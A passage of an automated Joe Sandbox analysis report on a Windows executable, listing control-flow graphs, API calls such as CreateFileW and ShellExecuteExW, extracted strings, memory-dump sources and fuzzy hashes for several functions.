521->525 549 10bf5a-10bf69 call 1135b3 522->549 550 10bf6b-10bf79 call fb925 522->550 525->497 534 10bfe8-10bfeb 525->534 526->527 527->493 533->489 538 10bfef-10c01b call f400a GetFileAttributesW 534->538 547 10bfed-10bfee 538->547 548 10c01d-10c033 MoveFileW 538->548 540->426 544 10c327-10c33b SendMessageW 540->544 544->426 547->538 548->497 551 10c035-10c03f MoveFileExW 548->551 549->550 556 10bf7f-10bfbe call 1135b3 call 10f350 549->556 550->513 550->556 551->497 556->521
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0010BDFA
                                                                                                • Part of subcall function 0010AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0010AAFE
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0010C127
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 0010C2B1
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0010C2EC
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0010C2FC
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,0013A472), ref: 0010C30A
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0010C335
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 3564274579-312220925
                                                                                              • Opcode ID: 7b594a6eaa435347ac556e9a45365b4ea697b9e0f171c93bbe3355d49552a709
                                                                                              • Instruction ID: 658a7844bf3a0e60c90cca971048968032de956b5de39cb360e3865deb5fa548
                                                                                              • Opcode Fuzzy Hash: 7b594a6eaa435347ac556e9a45365b4ea697b9e0f171c93bbe3355d49552a709
                                                                                              • Instruction Fuzzy Hash: B6E17076D04219EADB25DBA0DC85DEF737CAF19711F0041A6F649E3091EBB49AC48FA0
                                                                                              Function 000FD341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 561 fd341-fd378 call 10e28c call 10e360 call 1115e8 568 fd3ab-fd3b4 call ffe56 561->568 569 fd37a-fd3a9 GetModuleFileNameW call fbc85 call ffe2e 561->569 573 fd3b9-fd3dd call f9619 call f99b0 568->573 569->573 580 fd3e3-fd3eb 573->580 581 fd7a0-fd7a6 call f9653 573->581 583 fd3ed-fd405 call 103781 * 2 580->583 584 fd409-fd438 call 115a90 * 2 580->584 586 fd7ab-fd7bb 581->586 594 fd407 583->594 595 fd43b-fd43e 584->595 594->584 596 fd56c-fd58f call f9d30 call 1135d3 595->596 597 fd444-fd44a call f9e40 595->597 596->581 606 fd595-fd5b0 call f9bf0 596->606 601 fd44f-fd476 call f9bf0 597->601 607 fd47c-fd484 601->607 608 fd535-fd538 601->608 618 fd5b9-fd5cc call 1135d3 606->618 619 fd5b2-fd5b7 606->619 611 fd4af-fd4ba 607->611 612 fd486-fd48e 607->612 609 fd53b-fd55d call f9d30 608->609 609->595 629 fd563-fd566 609->629 615 fd4bc-fd4c8 611->615 616 fd4e5-fd4ed 611->616 612->611 613 fd490-fd4aa call 115ec0 612->613 633 fd4ac 613->633 634 fd52b-fd533 613->634 615->616 622 fd4ca-fd4cf 615->622 623 fd4ef-fd4f7 616->623 624 fd519-fd51d 616->624 618->581 639 fd5d2-fd5ee call 10137a call 1135ce 618->639 626 fd5f1-fd5f8 619->626 622->616 630 fd4d1-fd4e3 call 115808 622->630 623->624 631 fd4f9-fd513 call 115ec0 623->631 624->608 625 fd51f-fd522 624->625 625->607 636 fd5fc-fd625 call ffdfb call 1135d3 626->636 637 fd5fa 626->637 629->581 629->596 630->616 644 fd527 630->644 631->581 631->624 633->611 634->609 650 fd627-fd62e call 1135ce 636->650 651 fd633-fd649 636->651 637->636 639->626 644->634 650->581 654 fd64f-fd65d 651->654 655 fd731-fd757 call fce72 call 1135ce * 2 651->655 657 fd664-fd669 654->657 686 fd759-fd76f call 103781 * 2 655->686 687 fd771-fd79d call 115a90 * 2 655->687 659 fd66f-fd678 657->659 660 fd97c-fd984 657->660 662 fd67a-fd67e 659->662 663 fd684-fd68b 659->663 664 fd72b-fd72e 660->664 665 fd98a-fd98e 660->665 662->660 662->663 667 fd691-fd6b6 663->667 668 fd880-fd891 call ffcbf 663->668 664->655 669 fd9de-fd9e4 665->669 670 fd990-fd996 665->670 675 fd6b9-fd6de call 1135b3 call 115808 667->675 688 fd897-fd8c0 call ffe56 call 115885 668->688 689 fd976-fd979 668->689 673 fda0a-fda2a call fce72 669->673 674 fd9e6-fd9ec 669->674 676 fd99c-fd9a3 670->676 677 fd722-fd725 670->677 699 fda02-fda05 673->699 674->673 680 fd9ee-fd9f4 674->680 713 fd6f6 675->713 714 fd6e0-fd6ea 675->714 683 fd9ca 676->683 684 fd9a5-fd9a8 676->684 677->657 677->664 680->677 691 fd9fa-fda01 680->691 690 fd9cc-fd9d9 683->690 694 fd9aa-fd9ad 684->694 695 fd9c6-fd9c8 684->695 686->687 687->581 688->689 721 fd8c6-fd93c call 101596 call ffdfb call ffdd4 call ffdfb call 1158d9 688->721 689->660 690->677 691->699 701 fd9af-fd9b2 694->701 702 fd9c2-fd9c4 694->702 695->690 703 fd9be-fd9c0 701->703 704 fd9b4-fd9b8 701->704 702->690 703->690 704->680 709 fd9ba-fd9bc 704->709 709->690 716 fd6f9-fd6fd 713->716 714->713 715 fd6ec-fd6f4 714->715 715->716 716->675 720 fd6ff-fd706 716->720 722 fd7be-fd7c1 720->722 723 fd70c-fd71a call ffdfb 720->723 753 fd93e-fd947 721->753 754 fd94a-fd95f 721->754 722->668 727 fd7c7-fd7ce 722->727 728 fd71f 723->728 730 fd7d6-fd7d7 727->730 731 fd7d0-fd7d4 727->731 728->677 730->727 731->730 732 fd7d9-fd7e7 731->732 734 fd7e9-fd7ec 732->734 735 fd808-fd830 call 101596 732->735 737 fd7ee-fd803 734->737 738 fd805 734->738 744 fd853-fd85b 735->744 745 fd832-fd84e call 1135e9 735->745 737->734 737->738 738->735 748 fd85d 744->748 749 fd862-fd87b call fdd6b 744->749 745->728 748->749 749->728 753->754 756 fd960-fd967 754->756 757 fd969-fd96d 756->757 758 fd973-fd974 756->758 757->728 757->758 758->756
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000FD346
                                                                                              • _wcschr.LIBVCRUNTIME ref: 000FD367
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,000FD328,?), ref: 000FD382
                                                                                              • __fprintf_l.LIBCMT ref: 000FD873
                                                                                                • Part of subcall function 0010137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000FB652,00000000,?,?,?,00010412), ref: 00101396
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 4184910265-980926923
                                                                                              • Opcode ID: 2f5346e9c13d5bbc395e72b1e3a5607dc1f341fd2b5e9d9bab0836658b2b2f85
                                                                                              • Instruction ID: 971d205afcc0a56e5518ea42a95137fab287604e2d90213810e52420fddd0670
                                                                                              • Opcode Fuzzy Hash: 2f5346e9c13d5bbc395e72b1e3a5607dc1f341fd2b5e9d9bab0836658b2b2f85
                                                                                              • Instruction Fuzzy Hash: E812C27190021D9ADF24EFA4DC85BFEB7B6FF14704F10416AE715A7592EB709A80EB20
                                                                                              Function 0010CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0010AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010AC85
                                                                                                • Part of subcall function 0010AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010AC96
                                                                                                • Part of subcall function 0010AC74: IsDialogMessageW.USER32(00010412,?), ref: 0010ACAA
                                                                                                • Part of subcall function 0010AC74: TranslateMessage.USER32(?), ref: 0010ACB8
                                                                                                • Part of subcall function 0010AC74: DispatchMessageW.USER32(?), ref: 0010ACC2
                                                                                              • GetDlgItem.USER32(00000068,0014ECB0), ref: 0010CB6E
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0010A632,00000001,?,?,0010AECB,00124F88,0014ECB0), ref: 0010CB96
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0010CBA1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,001235B4), ref: 0010CBAF
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0010CBC5
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0010CBDF
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0010CC23
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0010CC31
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0010CC40
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0010CC67
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,0012431C), ref: 0010CC76
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: acd27e42a7c46b1e9be118aada48cea8ae90b7f64d0c1735f26cbca0ab45f3ba
                                                                                              • Instruction ID: 59aa9390497c566fbc8397a2babe12774b58cb86d704337b063cb9922c11ad66
                                                                                              • Opcode Fuzzy Hash: acd27e42a7c46b1e9be118aada48cea8ae90b7f64d0c1735f26cbca0ab45f3ba
                                                                                              • Instruction Fuzzy Hash: 2731C172145741EBE311DF20DC4AFAB7FACEB82715F000508F6A19A5D1DB745944CBB6
                                                                                              Function 0010CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 795 10ce22-10ce3a call 10e360 798 10ce40-10ce4c call 1135b3 795->798 799 10d08b-10d093 795->799 798->799 802 10ce52-10ce7a call 10f350 798->802 805 10ce84-10ce91 802->805 806 10ce7c 802->806 807 10ce93 805->807 808 10ce95-10ce9e 805->808 806->805 807->808 809 10cea0-10cea2 808->809 810 10ced6 808->810 811 10ceaa-10cead 809->811 812 10ceda-10cedd 810->812 813 10ceb3-10cebb 811->813 814 10d03c-10d041 811->814 815 10cee4-10cee6 812->815 816 10cedf-10cee2 812->816 817 10cec1-10cec7 813->817 818 10d055-10d05d 813->818 819 10d043 814->819 820 10d036-10d03a 814->820 821 10cef9-10cf0e call fb493 815->821 822 10cee8-10ceef 815->822 816->815 816->821 817->818 824 10cecd-10ced4 817->824 826 10d065-10d06d 818->826 827 10d05f-10d061 818->827 825 10d048-10d04c 819->825 820->814 820->825 830 10cf10-10cf1d call 1017ac 821->830 831 10cf27-10cf32 call fa180 821->831 822->821 828 10cef1 822->828 824->810 824->811 825->818 826->812 827->826 828->821 830->831 836 10cf1f 830->836 837 10cf34-10cf4b call fb239 831->837 838 10cf4f-10cf5c ShellExecuteExW 831->838 836->831 837->838 840 10cf62-10cf6f 838->840 841 10d08a 838->841 843 10cf71-10cf78 840->843 844 10cf82-10cf84 840->844 841->799 843->844 845 10cf7a-10cf80 843->845 846 10cf86-10cf8f 844->846 847 10cf9b-10cfba call 10d2e6 844->847 845->844 848 10cff1-10cffd CloseHandle 845->848 846->847 856 10cf91-10cf99 ShowWindow 846->856 847->848 865 10cfbc-10cfc4 847->865 849 10d00e-10d01c 848->849 850 10cfff-10d00c call 1017ac 848->850 854 10d079-10d07b 849->854 855 10d01e-10d020 849->855 850->849 862 10d072 850->862 854->841 859 10d07d-10d07f 854->859 855->854 860 10d022-10d028 855->860 856->847 859->841 863 10d081-10d084 ShowWindow 859->863 860->854 864 10d02a-10d034 860->864 862->854 863->841 864->854 865->848 866 10cfc6-10cfd7 GetExitCodeProcess 865->866 866->848 867 10cfd9-10cfe3 866->867 868 10cfe5 867->868 869 10cfea 867->869 868->869 869->848
                                                                                              APIs
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0010CF54
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0010CF93
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0010CFCF
                                                                                              • CloseHandle.KERNEL32(?), ref: 0010CFF5
                                                                                              • ShowWindow.USER32(?,00000001), ref: 0010D084
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                              • String ID: $.exe$.inf
                                                                                              • API String ID: 3686203788-2452507128
                                                                                              • Opcode ID: a9aa768357536637c6793533233e99735e166d313ea3a9752e022531e678f3fd
                                                                                              • Instruction ID: cb4a9629f0c769594455e05ab0952cfe9f0f106058ae6e88e26162a0317aee9e
                                                                                              • Opcode Fuzzy Hash: a9aa768357536637c6793533233e99735e166d313ea3a9752e022531e678f3fd
                                                                                              • Instruction Fuzzy Hash: 6361E171504381EAD7319F64E8406ABBBEABF81300F04491AF5C9972E5D7F1998ACF92
                                                                                              Function 0011A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 870 11a058-11a071 871 11a073-11a083 call 11e6ed 870->871 872 11a087-11a08c 870->872 871->872 879 11a085 871->879 874 11a099-11a0bd MultiByteToWideChar 872->874 875 11a08e-11a096 872->875 877 11a250-11a263 call 10ec4a 874->877 878 11a0c3-11a0cf 874->878 875->874 880 11a0d1-11a0e2 878->880 881 11a123 878->881 879->872 884 11a101-11a112 call 118518 880->884 885 11a0e4-11a0f3 call 121a30 880->885 883 11a125-11a127 881->883 888 11a245 883->888 889 11a12d-11a140 MultiByteToWideChar 883->889 884->888 895 11a118 884->895 885->888 898 11a0f9-11a0ff 885->898 893 11a247-11a24e call 11a2c0 888->893 889->888 892 11a146-11a158 call 11a72c 889->892 900 11a15d-11a161 892->900 893->877 899 11a11e-11a121 895->899 898->899 899->883 900->888 902 11a167-11a16e 900->902 903 11a170-11a175 902->903 904 11a1a8-11a1b4 902->904 903->893 907 11a17b-11a17d 903->907 905 11a200 904->905 906 11a1b6-11a1c7 904->906 910 11a202-11a204 905->910 908 11a1e2-11a1f3 call 118518 906->908 909 11a1c9-11a1d8 call 121a30 906->909 907->888 911 11a183-11a19d call 11a72c 907->911 915 11a23e-11a244 call 11a2c0 908->915 926 11a1f5 908->926 909->915 924 11a1da-11a1e0 909->924 914 11a206-11a21f call 11a72c 910->914 910->915 911->893 923 11a1a3 911->923 914->915 927 11a221-11a228 914->927 915->888 923->888 928 11a1fb-11a1fe 924->928 926->928 929 11a264-11a26a 927->929 930 11a22a-11a22b 927->930 928->910 931 11a22c-11a23c WideCharToMultiByte 929->931 930->931 931->915 932 11a26c-11a273 call 11a2c0 931->932 932->893
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00114E35,00114E35,?,?,?,0011A2A9,00000001,00000001,3FE85006), ref: 0011A0B2
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0011A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0011A138
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0011A232
                                                                                              • __freea.LIBCMT ref: 0011A23F
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              • __freea.LIBCMT ref: 0011A248
                                                                                              • __freea.LIBCMT ref: 0011A26D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 1809bf7ab3089222b36620f52fdd234cfcc96d3fe96f4700b0d21aeec770bca8
                                                                                              • Instruction ID: 7419bcf9c079f121260db66d242a06066c4c9417d54ada6d56dcb1606fab34ac
                                                                                              • Opcode Fuzzy Hash: 1809bf7ab3089222b36620f52fdd234cfcc96d3fe96f4700b0d21aeec770bca8
                                                                                              • Instruction Fuzzy Hash: 1151B0B2612216AFDB2D8E64CC41EFB7BAAEF54760F954239FC04D6140DB35DCD086A2
                                                                                              Function 0010A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00100085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                                • Part of subcall function 00100085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              • OleInitialize.OLE32(00000000), ref: 0010A34E
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0010A385
                                                                                              • SHGetMalloc.SHELL32(00138430), ref: 0010A38F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3Ro
                                                                                              • API String ID: 3498096277-3613677438
                                                                                              • Opcode ID: 94b86a00997fac0446907a823a15da08047b53650be88a6787dda2b1020b973d
                                                                                              • Instruction ID: 372db11e4a1b84f6028ebfc4192e92a0a59cbba4282c1e9e638c9f910b2611e7
                                                                                              • Opcode Fuzzy Hash: 94b86a00997fac0446907a823a15da08047b53650be88a6787dda2b1020b973d
                                                                                              • Instruction Fuzzy Hash: 81F0F9B2D00209ABCB10AFA9D849AEFFBFCEF95701F00415AF854E2240DBB456458BA1
                                                                                              Function 000F99B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 939 f99b0-f99d1 call 10e360 942 f99dc 939->942 943 f99d3-f99d6 939->943 945 f99de-f99fb 942->945 943->942 944 f99d8-f99da 943->944 944->945 946 f99fd 945->946 947 f9a03-f9a0d 945->947 946->947 948 f9a0f 947->948 949 f9a12-f9a31 call f70bf 947->949 948->949 952 f9a39-f9a57 CreateFileW 949->952 953 f9a33 949->953 954 f9abb-f9ac0 952->954 955 f9a59-f9a7b GetLastError call fb66c 952->955 953->952 957 f9ac2-f9ac5 954->957 958 f9ae1-f9af5 954->958 963 f9a7d-f9a9f CreateFileW GetLastError 955->963 964 f9aaa-f9aaf 955->964 957->958 960 f9ac7-f9adb SetFileTime 957->960 961 f9af7-f9b0f call ffe56 958->961 962 f9b13-f9b1e 958->962 960->958 961->962 966 f9aa5-f9aa8 963->966 967 f9aa1 963->967 964->954 968 f9ab1 964->968 966->954 966->964 967->966 968->954
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,000F78AD,?,00000005,?,00000011), ref: 000F9A4C
                                                                                              • GetLastError.KERNEL32(?,?,000F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F9A59
                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,000F78AD,?,00000005,?), ref: 000F9A8E
                                                                                              • GetLastError.KERNEL32(?,?,000F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F9A96
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F9ADB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 5423a26c4494beb6e4dfe9f0306d297c1edecf8aa8c0f8381dad35cc259a091a
                                                                                              • Instruction ID: cd6c15e4fe7c7bd208c82d1e35f01ba388e156830d6715e4dcb384be523cc1e1
                                                                                              • Opcode Fuzzy Hash: 5423a26c4494beb6e4dfe9f0306d297c1edecf8aa8c0f8381dad35cc259a091a
                                                                                              • Instruction Fuzzy Hash: 8D41783054474A6FE3309F24CC05BEABBD0BB01324F100719F6E4969D1E7B9A999DBE6
                                                                                              Function 0010AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 998 10ac74-10ac8d PeekMessageW 999 10acc8-10accc 998->999 1000 10ac8f-10aca3 GetMessageW 998->1000 1001 10acb4-10acc2 TranslateMessage DispatchMessageW 1000->1001 1002 10aca5-10acb2 IsDialogMessageW 1000->1002 1001->999 1002->999 1002->1001
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010AC85
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010AC96
                                                                                              • IsDialogMessageW.USER32(00010412,?), ref: 0010ACAA
                                                                                              • TranslateMessage.USER32(?), ref: 0010ACB8
                                                                                              • DispatchMessageW.USER32(?), ref: 0010ACC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
